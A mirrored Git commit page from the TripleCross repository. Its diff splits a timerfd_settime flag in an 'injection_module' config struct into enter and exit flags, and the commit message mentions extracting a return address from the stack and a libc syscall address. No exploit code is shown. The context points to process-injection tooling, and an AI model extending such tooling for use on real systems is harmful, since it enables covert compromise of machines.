mirror of
https://github.com/h3xduck/TripleCross.git
synced 2025-12-25 10:53:09 +08:00
Finished extraction of return address from the stack, and libc syscall adress
This commit is contained in:
@@ -37,7 +37,8 @@ typedef struct module_config_t{
|
||||
|
||||
struct injection_module {
|
||||
char all;
|
||||
char sys_timerfd_settime;
|
||||
char sys_enter_timerfd_settime;
|
||||
char sys_exit_timerfd_settime;
|
||||
}injection_module;
|
||||
|
||||
} module_config_t;
|
||||
|
||||
Reference in New Issue
Block a user